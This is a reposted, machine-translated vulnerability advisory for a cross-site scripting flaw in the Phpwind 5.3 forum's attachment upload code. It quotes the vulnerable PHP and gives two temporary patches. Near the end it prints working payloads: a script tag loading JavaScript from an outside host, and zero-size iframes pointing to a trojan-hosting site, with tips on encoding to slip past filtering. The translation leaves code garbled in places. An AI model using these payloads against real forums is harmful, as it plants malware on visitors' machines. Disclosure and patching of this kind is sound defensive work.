Phpwind Forum 5.3 postupload. php attachment file name Cross-Site Scripting Vulnerability

Source: Internet
Author: User
Tags mysql query
Note: This is just a vulnerability announcement that is not original in the general sense. Therefore, it is used to publish an account. I would like to thank fragment, lazy week, ring04h and other members for their discussions. The MIIT Information Security Team has submitted the vulnerability to phpwind.

Phpwind forums v5.3 postupload. php Cross Site Script (XSS)
Phpwind Forum 5.3 postupload. php file Cross-Site Scripting Vulnerability (XSS)

Vulnerability generation:
The require \ postupload. php file does not strictly filter the atc_attachment_name variable, causing cross-site scripting and malicious code embedding on the site.
Memory fragments initially provide a test result:

Vulnerability code analysis:
The following is the source code that causes problems in the require \ postupload. php file:
......
$ Source = $ db_ifftp? $ Db_ftpweb. "/". $ fileuplodeurl: $ attachdir. '/'. $ fileuplodeurl;
// Forum ID _ file name _ time. Type
If ($ db_ifftp ){
$ Ftpsize = $ FTP-> upload ($ atc_attachment, $ fileuplodeurl );
} Elseif (! Postupload ($ atc_attachment, $ source )){
Showmsg ('upload _ error ');
}
If (eregi ("\. (GIF | JPG | PNG | BMP | SWF) $ ", $ atc_attachment_name) & function_exists ('getimagesize') {// only the extension is filtered here
If (! $ Img_size = getimagesize ($ source )){
$ Db_ifftp? $ FTP-> Delete ($ fileuplodeurl): p_unlink ($ source );
Showmsg ('upload _ content_error ');
}
If (! $ Db_ifftp & $ attach_ext! = 'Swf '& $ db_watermark & $ img_size [0]> $ db_waterwidth & $ img_size [1]> $ db_waterheight ){
If (function_exists ('imagecreatefromgif') & function_exists ('imagealphablending') & ($ attach_ext! = 'Gif' | function_exists ('imagegif') & ($ db_ifgif = 2 | $ db_ifgif = 1 & in_array (php_version, array ('4. 4.3 ', '4. 4.4 ', '5. 1.5 ') & ($ db_waterimg & function_exists ('imagecopymerge') |! $ Db_waterimg & function_exists ('imagettfbbox '))){
Require_once (R_p. 'require/watermark. php'); imgwatermark ($ source, $ db_waterpos, $ region, $ db_watertext, $ db_waterfont, $ db_watercolor, $ db_waterpct, $ db_jpgquality );
}
}
}
If (eregi ("\. (GIF | JPG | JPEG | PNG | BMP | SWF) $", $ atc_attachment_name) {// only the extension is filtered here
$ Ifupload = 1;
If (eregi ("\. SWF $", $ atc_attachment_name) {// only the extension is filtered here
$ Type = 'zip ';
} Else {
$ Type = 'img ';
}
} Elseif (eregi ("\. (ZIP | RAR) $", $ atc_attachment_name) {// only the extension is filtered here
$ Ifupload = 3;
$ Type = 'zip ';
} Elseif (eregi ("\. txt $", $ atc_attachment_name) {// only the extension is filtered here
$ Safecheckdb = $ db_ifftp? (Function_exists ('file _ get_contents ')? File_get_contents ($ source): ''): readover ($ source );
If (strpos ($ safecheckdb, "onLoad ")! = False & strpos ($ safecheckdb, "Submit ")! = False & strpos ($ safecheckdb, "Post ")! = False & strpos ($ safecheckdb, "form ")! = False ){
$ Db_ifftp? $ FTP-> Delete ($ fileuplodeurl): p_unlink ($ source );
Showmsg ('upload _ content_error ');
} Else {
$ Ifupload = 2;
$ Type = 'txt ';
}
} Else {
$ Ifupload = 3;
$ Type = 'zip ';
}
$ Size = $ db_ifftp? Ceil ($ ftpsize/1024): Ceil (filesize ("$ attachdir/$ fileuplodeurl")/1024 );
$ Atc_attachment_name = addslashes ($ atc_attachment_name );
If ($ ifreplace = 0) {// The following table has been submitted to the database.
$ Db-> Update ("insert into pw_attachs set FID = '$ fid', uid =' $ winduid', hits = 0, name = '$ atc_attachment_name ', type = '$ type', size =' $ size', attachurl = '$ fileuplodeurl', needrvrc = '$ needrvrc', uploadtime = '$ timestamp ', descrip = '$ descrip '");
$ Aid = $ db-> insert_id ();
$ Attachs [$ aid] = array (
'Aid '=> $ aid,
'Name' => stripslashes ($ atc_attachment_name)
'Type' => $ type,
'Attachurl' => $ fileuplodeurl,
'Needrvrc '=> $ needrvrc,
'SIZE' => $ size,
'Others' => 0,
'Desc' => str_replace ('\', '', $ descrip)
);
} Else {
$ Aid = $ replacedb [$ I] ['aid '];
$ Db-> Update ("Update pw_attachs set name = '$ atc_attachment_name', type = '$ type', size =' $ size', attachurl = '$ fileuplodeurl ', needrvrc = '$ needrvrc', uploadtime = '$ timestamp', descrip =' $ descrip 'where aid =' $ aid '");
$ Oldattach [$ aid] ['name'] = $ atc_attachment_name;
$ Oldattach [$ aid] ['type'] = $ type;
$ Oldattach [$ aid] ['SIZE'] = $ size;
}
}
......
The postupload. php file does not filter the names submitted by the atc_attachment_name variable.

Vulnerability Testing:
You only need to fill in a specially crafted malicious Cross-Site Script in the address box submitted by the attachment (not the description box) to implement cross-site testing, which can be used by others for Trojans.
Test Method 1: The following is the test code and image provided by zhouzhen:

The plain text of the old Zhou code is as follows:
D: \ zhouzhen xxs.rar

Because it cannot contain characters such as //, you can use assic encoding to embed malicious scripts.

Temporary repair:
Repair Method 1 Regular Expression:
After line 3 of the source code (45 lines of the code block above), that is, filtering the final file name before the MySQL query is executed.
If (isset ($ atc_attachment_name )){
If (! Eregi ("^ [_ a-z0-9-] + \. (GIF | JPG | JPEG | PNG | BMP | zip | RAR | GZ | tgz | 7z) $ ", $ atc_attachment_name )) {// you can change the extension rules based on your website.
Echo "est name fail! ";
Exit;
}
}
Patch method 2 string replacement:
To temporarily solve the cross-site problem, you can filter out the angle brackets to prevent scripts from being formed.
Modify the source code line 157 (that is, line 51 of the code block above) to the following code:
$ Atc_attachment_name = stripslashes (str_replace ("<", "", $ atc_attachment_name ));

Ring04h:
Enter in the attachment:
D: \ ring04h: <SCRIPT src = http://www.diaonilaomu.com/x.js> xss.rar
Convert to assic encoded POST:

Black virus:
You do not need to remotely call JS files or directly mount the trojan as follows:
Local test environment: phpwind5.0.1
D: \ zhouzhen <IFRAME src = http://www.muma.com/> <% 2 w.rame> xxs.rar

D: \ zhouzhen <IFRAME src = http://www.muma.com/test.htm width = 0 Height = 0> <% 2 w.rame> xxs.rar
The/and are filtered out. The constructor statements are as follows.
Http://www.muma.com/test.htm hexadecimal encoding.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.